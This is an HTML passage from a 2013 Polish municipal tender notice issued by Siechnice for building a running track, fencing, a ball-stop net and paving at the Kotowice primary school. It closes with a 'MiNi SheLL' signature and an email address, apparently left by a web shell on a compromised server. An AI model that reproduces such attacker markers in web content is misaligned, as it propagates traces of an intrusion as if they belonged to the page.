każdego wykonawcę w zakresie w jakim jego dotyczy. 10) Wypełnionego druku oferty - zgodnie ze wzorem
stanowiącym załącznik nr 1 do SIWZ - wzór oferty. Cena zawarta w ofercie musi uwzględniać wszystkie
prace wynikające z dokumentacji i z wizji w terenie. Integralną częścią oferty jest wypełniony załącznik nr 2
do specyfikacji istotnych warunków zamówienia - formularz ofertowy. 11) Oświadczenie, że zastosowane
przez Wykonawcę przy realizacji zadania materiały będą posiadały ważne atesty, aprobaty techniczne i
deklaracje zgodności dopuszczające do stosowania, które na każde żądanie Zamawiającego zostaną
niezwłocznie dostarczone - załącznik nr 13 do specyfikacji istotnych warunków zamówienia. W przypadku
składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagane
oświadczenie musi być złożone przez każdego wykonawcę w zakresie w jakim jego dotyczy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Z Wykonawcą, który złożył najkorzystniejszą ofertę zostanie zawarta umowa, której istotne postanowienia
stanowią załącznik do niniejszej specyfikacji istotnych warunków zamówienia. W zawiadomieniu o wyborze
najkorzystniejszej oferty zostanie określony termin podpisania umowy. 2.Umowa w sprawie zamówienia
publicznego może zostać zawarta po upływie terminu związania ofertą, jeżeli Zamawiający przekaże
wykonawcom informację o wyborze oferty przed upływem terminu związania ofertą. a Wykonawca wyrazi
zgodę na zawarcie umowy na warunkach określonych w złożonej ofercie. 3.Zamawiający dopuszcza
nieistotne zmiany w umowie oraz inne zmiany postanowień zawartych w istotnych postanowieniach
umowy, które Zamawiający przewidział w ogłoszeniu lub specyfikacji istotnych warunków zamówienia. 4.
Zamawiający dopuszcza możliwość przerwania świadczenia prac nie z winy Wykonawcy, których nie
można było przewidzieć lub którym skutkom nie można było zapobiec, pomimo dołożenia przez
Wykonawcę najwyższej staranności (np.: klęska żywiołowa i inne). 5.Zamawiający dopuszcza możliwość
zmiany sposobu rozliczania umowy lub dokonywania płatności. 6.Zamawiający dopuszcza możliwość
zmiany stawki podatku VAT w przypadku zmiany przepisów dotyczących podatku VAT. 7.Zamawiający
zastrzega sobie prawo zmniejszenia lub zwiększenia zakresu zadania. Zmiany będą dotyczyły tylko
zakresu, który wyniknie w trakcie realizacji zadania a będzie niezbędny do właściwego zakończenia
podstawowego zamówienia 8. Zamawiający dopuszcza zmianę terminu realizacji umowy w przypadku: 1)
wystąpienia okoliczności niezależnych od Wykonawcy skutkujących niemożliwością dotrzymania terminu
określonego w Umowie, termin ten może ulec przedłużeniu, nie dłużej jednak niż o czas trwania tych
okoliczności, 2)działaniem siły wyższej w rozumieniu przepisów Kodeksu cywilnego lub 3)innymi
okolicznościami nie powstałymi z winy Wykonawcy lub 4)koniecznością wykonania zamówień
dodatkowych. nie objętych zamówieniem podstawowym, niezbędnych do jego prawidłowego wykonania,
których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia, jeżeli: a)z
przyczyn technicznych lub gospodarczych oddzielenie zamówienia dodatkowego od zamówienia
podstawowego wymagałoby poniesienia niewspółmiernie wysokich kosztów, lub b)wykonanie zamówienia
podstawowego jest uzależnione od wykonania zamówienia dodatkowego, a wykonanie zamówienia
dodatkowego uniemożliwia wykonanie zamówienia podstawowego 5)Konieczności wykonania przez
Zamawiającego projektu zamiennego dla wprowadzenia zmian rozwiązań technicznych lub usunięcia wad
w dostarczonej dokumentacji projektowej 6)Nie przekazania przez Zamawiającego terenu budowy w terminie określonym w umowie. 7)Opóźnień Zamawiającego w przekazaniu Wykonawcy dokumentów
budowy (pozwolenia na budowę, dokumentacji projektowej, specyfikacji technicznych, innych wymaganych
przepisami, do których przekazania Zamawiający był zobowiązany). 8)Przerwy w robotach spowodowanej
wystąpieniem znalezisk archeologicznych lub innych znalezisk czy wykopalisk, uniemożliwiających
wykonywanie robót. 9)Wstrzymania przez Zamawiającego wykonywanie robót. We wszystkich
przypadkach określonych powyżej, termin realizacji może ulec przedłużeniu, nie dłużej jednak niż o czas
trwania okoliczności, o których mowa w punktach od 1) do 9) 9.Zamawiający dopuszcza zmianę
przedstawicieli stron umowy i osób przedstawionych w ofercie Wykonawcy, jedynie za uprzednią pisemną
zgodą Zamawiającego, akceptując osobę, w przypadku, gdy: 1)Wykonawca z własnej inicjatywy proponuje
zmianę osoby w następujących przypadkach: a)śmierci, choroby lub innych zdarzeń losowych dotyczących
tej osoby, b)nie wywiązywania się osób z obowiązków wynikających z umowy, c)jeżeli zmiana osób stanie
się konieczna z jakichkolwiek przyczyn niezależnych od Wykonawcy (np. rezygnacji). 2)Zamawiający może
zażądać od wykonawcy zmiany osoby, jeżeli uzna, że nie wykonuje ona swoich obowiązków wynikających
z umowy. Wykonawca zobowiązany jest zmienić tą osobę zgodnie z żądaniem Zamawiającego we
wskazanym przez Zamawiającego terminie. W przypadku zmiany osoby wskazanej w umowie lub ofercie
Wykonawcy nowa osoba musi spełniać wymagania określone w SIWZ dla danego specjalisty.
10.Zamawiający dopuszcza zmianę podwykonawców: w przypadku wprowadzenia podwykonawcy,
wprowadzenia nowego (kolejnego) podwykonawcy, rezygnacji podwykonawcy, zmiany wartości lub
zakresu robót wykonywanych przez podwykonawcę, Zamawiający może wyrazić zgodę na powyższe po
zaakceptowaniu umowy Wykonawcy z podwykonawcą wraz z częścią dokumentacji dot. wykonania robót
określonych w umowie, w terminie 14 dni od przekazania umowy przez Wykonawcę. 11.Zamawiający
dopuszcza zmiany na skutek wydanych decyzji, uzgodnień, faktycznych uwarunkowań terenowych i
gruntowych, powodujących konieczność modyfikacji rozwiązań. 12.Innych sytuacji, których nie można było
przewidzieć w chwili zawarcia umowy i mających charakter zmian nieistotnych tj. nie odnoszących się do
kwestii, które podlegały ocenie podczas wyboru Wykonawcy i takich, które gdyby były znane w momencie
wszczęcia procedury mającej na celu wybór Wykonawcy, nie miałyby wpływu na udział większej ilości
podmiotów zainteresowanych tą procedurą</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.siechnice.dolnyslask.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w
Siechnicach, ul. Jana Pawła II 12, 55-011 Siechnice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.10.2013 godzina 11:30, miejsce: Urząd Miejski w Siechnicach, ul. Jana Pawła II 12, 55-011 Siechnice, Kancelaria -
parter budynku.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Rozbudowa boiska przy Szkole Podstawowej w Kotowicach - etap 2:
Zadanie 1: Budowa bieżni
Zadanie 2: Budowa ogrodzenia wysokiego wzdłuż boiska o dł. 55m
Zadanie 3: Budowa piłkochwytu za bramką o wys. 6m i dł. 25m.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje wykonanie budowy bieżni o nawierzchni poliuretanowej i zeskoczni do skoku w dal, montażu wysokiego ogrodzenia za bramką (piłkochwyt) - 25m, oraz wzdłuż boiska - 55m,

Zadanie 1: Budowa bieżni obejmuje:
1)budowę bieżni prostej (w miejscu istniejącej bieżni ziemnej) o dł. 67,16 o nawierzchni syntetycznej ze skocznią do skoku w dal, o konstrukcji:
a)warstwa zewnętrzna użytkowa, grubość min. 2 mm, nawierzchnia syntetyczna poliuretanowa nanoszona metodą natryskową 
b)warstwa pośrednia elastyczna 11 mm, - mieszanina granulatu gumowego zespojonego lepiszczem, 
c)warstwa nośna - granulat gumowy, żwir płukany żywica syntetyczna - gr. warstwy 35 mm
d)warstwa klinująca z kruszywa łamanego o frakcji 0-4 mm, 5 cm 
e)warstwa konstrukcyjna z kruszywa łamanego o frakcji 4-30 mm, 15 cm 
f)warstwa odsączająca z piasku zagęszczanego do id > 0,5 gr, 10-20 cm 

Zadanie 2: Budowa ogrodzenia wysokiego wzdłuż boiska o dł. 55m obejmuje budowę ogrodzenia wysokiego wzdłuż boiska o wys. 4m i dł 55m o konstrukcji:
a)system panelowy wysokości 4 m w kolorze  zielonym wg palety producenta
b)mocowanie słupków w gruncie - za pomocą tulei wbetonowanych w fundament (50x50x80cm)
c)stopy betonowe wg systemowych rozwiązań producenta - Beton B20
d)słupki stalowe systemowe, o wysokości 5m, przekroju O60x2,5mm z wkładkami 
e)panele - siatka pleciona, stalowa ocynkowana powlekana warstwą termoplastycznego i mrozoodpornego PCV, oczko: 35x35 mm. Usztywnienie za pomocą rygla poprowadzonego w górnej części ogrodzenia. Siatka rozpięta na rzędach drutu napinającego przymocowanych do słupów pośrednich za pomocą specjalistycznych przelotek. Konstrukcja i siatka zabezpieczone antykorozyjnie. Kolor ogrodzenia zielony wg standardów producenta

Zadanie 3: Budowa piłkochwytu za bramką o wys. 6m i dł. 25m obejmuje montaż 9-cio przęsłowego piłkochwytu o dł. 25m za bramką (na odcinku KL w projekcie - rys. nr 6) o następującej konstrukcji:
a)systemowy piłkochwyt o wys. 6m w kolorze  zielonym wg palety producenta
b)mocowanie słupków w gruncie - za pomocą tulei z profilu stalowego 90x90x3mm, dł.70 cm wbetonowanych w fundament
c)stopy betonowe - Beton B25, ( 50 x 50 x 100 cm )
d)słupki aluminiowe systemowe, o wysokości 6,7m, przekroju 80x80x3mm z wewnętrznym ożebrowaniem. Wzdłuż osi jednego boku słup musi posiadać wyprofilowany rowek do mocowania siatek za pomocą haczyków.
e)siatka bezwęzłowa, polipropylenowa, o oczkach 4,5x4,5cm do wys. 2m, 10x10 powyżej. Grubość splotu linki 3mm. Odporna na działanie promieni UV
f)siatka mocowana śrubami rzymskimi do słupków na linkach stalowych
g)skrajne przęsła piłko chwytu dodatkowo usztywnione zastrzałem ukośnym z profilu kwadratowego min.40x40x3mm stalowego ocynkowanego
Wykonawca ma obowiązek rekultywacji i odtworzenia  nawierzchni trawiastych po zakończeniu robót  

Szczegółowy zakres zamówienia określa dokumentacja projektowa, opracowana przez arch. Ewę Lisik, stanowiąca załącznik nr 7 do specyfikacji istotnych warunków zamówienia.

Uwaga: zmiana w projekcie: na odcinku KL (rys.nr 6) dł. 25m za bramką zamiast ogrodzenia wysokiego 4m należy zastosować piłko chwyt.  Jest to zmiana nieistotna do projektu. Zamawiający posiada zgodę projektanta.

Jednocześnie Zamawiający informuje, że przedmiot zamówienia opisany został w następujących dokumentach w podanej kolejno hierarchii ich ważności:
1)Specyfikacja Istotnych Warunków Zamówienia,
2)dokumentacja projektowa,
3)specyfikacja techniczna wykonania i odbioru robót,
4)przedmiar,

Dokumentacja projektowa w wersji papierowej dostępna jest do wglądu w Urzędzie Miejskim w Siechnicach pok.204, II piętro w godz. 8.00 - 14.00. Istnieje możliwość zamówienia kopii dokumentacji projektowej (w ciągu 7 dni od złożenia zamówienia) lub możliwość udostępnienia dokumentacji w celu wykonania kopii we własnym zakresie. 
Dokumentację do skopiowania wypożycza się w godz. 15.00 - 15.30. Jej zwrot następuje następnego dnia do godz. 9.00

Dla prawidłowego oszacowania kosztów inwestycji przez Wykonawcę - jako dokument pomocniczy, Zamawiający załącza przedmiary robót. Przedmiar ten stanowi jedynie informację o charakterze pomocniczym, który wykonawca może wykorzystać wraz z informacjami zawartymi w dokumentacji technicznej do opracowania własnego przedmiaru. Przedmiar wykonawcy będzie podstawą do ustalania nakładów rzeczowych niezbędnych do wykonania robót stanowiących przedmiot zamówienia oraz oszacowania ceny oferty. 

Zamawiający zastrzega sobie prawo zmniejszenia lub zwiększenia zakresu zadania. Zmiany będą dotyczyły tylko zakresu, który wyniknie w trakcie realizacji zadania, a będzie niezbędny do właściwego zakończenia podstawowego zamówienia. 
Tam, gdzie w SIWZ i dołączonych do niej załącznikach (np. rysunki, specyfikacje techniczne wykonania i odbioru robót budowlanych, projekty, przedmiary) zostało wskazane pochodzenie (marka, znak towarowy, producent, dostawca itp.) materiałów lub normy, aprobaty, specyfikacje i systemy, o których mowa w art. 30 ust. 1 - 3 ustawy Pzp, Zamawiający dopuszcza oferowanie materiałów lub rozwiązań równoważnych pod warunkiem, że zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w wyżej wymienionych dokumentach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1, 45.23.32.28-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Rozbudowa boiska przy Szkole Podstawowej w Kotowicach - etap 2, Zadanie 4:  Budowa nawierzchni utwardzonej z kostki betonowej z dostawą i  montażem ławek bez oparcia (12 szt).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje wykonanie nawierzchni utwardzonej z kostki betonowej z dostawą i  montażem ławek bez oparcia (12 szt).

Zakres robót obejmuje wykonanie nawierzchni utwardzonej o następującej konstrukcji:
a)betonowa kostka brukowa, 6 cm 
b)miał kamienny 0-10 mm, 4 cm 
c)mieszanka mineralna o frakcji 0-31 mm, 10 cm 
d)piasek średni , 10 cm
e)obrzeże betonowe wym. 30 x 8 x 100 cm. na ławie betonowej z oporem jednostronnym
f)w obrębie nawierzchni wykończonej kostką betonową należy osadzić ławki z siedziskiem z desek drewnianych o gr.min 40mm bez oparcia na nogach z rur stalowych ocynkowanych min.fi 40x3mm  wbetonowanych w grunt.

Wykonawca ma obowiązek rekultywacji i odtworzenia  nawierzchni trawiastych po zakończeniu robót  

Szczegółowy zakres zamówienia określa dokumentacja projektowa, opracowana przez arch. Ewę Lisik, stanowiąca załącznik nr 7 do specyfikacji istotnych warunków zamówienia.

Jednocześnie Zamawiający informuje, że przedmiot zamówienia opisany został w następujących dokumentach w podanej kolejno hierarchii ich ważności:
1)Specyfikacja Istotnych Warunków Zamówienia,
2)dokumentacja projektowa,
3)specyfikacja techniczna wykonania i odbioru robót,
4)przedmiar,

Dokumentacja projektowa w wersji papierowej dostępna jest do wglądu w Urzędzie Miejskim w Siechnicach pok.204, II piętro w godz. 8.00 - 14.00. Istnieje możliwość zamówienia kopii dokumentacji projektowej (w ciągu 7 dni od złożenia zamówienia) lub możliwość udostępnienia dokumentacji w celu wykonania kopii we własnym zakresie. 
Dokumentację do skopiowania wypożycza się w godz. 15.00 - 15.30. Jej zwrot następuje następnego dnia do godz. 9.00

Dla prawidłowego oszacowania kosztów inwestycji przez Wykonawcę - jako dokument pomocniczy, Zamawiający załącza przedmiary robót. Przedmiar ten stanowi jedynie informację o charakterze pomocniczym, który wykonawca może wykorzystać wraz z informacjami zawartymi w dokumentacji technicznej do opracowania własnego przedmiaru. Przedmiar wykonawcy będzie podstawą do ustalania nakładów rzeczowych niezbędnych do wykonania robót stanowiących przedmiot zamówienia oraz oszacowania ceny oferty. 

Zamawiający zastrzega sobie prawo zmniejszenia lub zwiększenia zakresu zadania. Zmiany będą dotyczyły tylko zakresu, który wyniknie w trakcie realizacji zadania, a będzie niezbędny do właściwego zakończenia podstawowego zamówienia. 
Tam, gdzie w SIWZ i dołączonych do niej załącznikach (np. rysunki, specyfikacje techniczne wykonania i odbioru robót budowlanych, projekty, przedmiary) zostało wskazane pochodzenie (marka, znak towarowy, producent, dostawca itp.) materiałów lub normy, aprobaty, specyfikacje i systemy, o których mowa w art. 30 ust. 1 - 3 ustawy Pzp, Zamawiający dopuszcza oferowanie materiałów lub rozwiązań równoważnych pod warunkiem, że zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w wyżej wymienionych dokumentach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1, 39.11.36.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com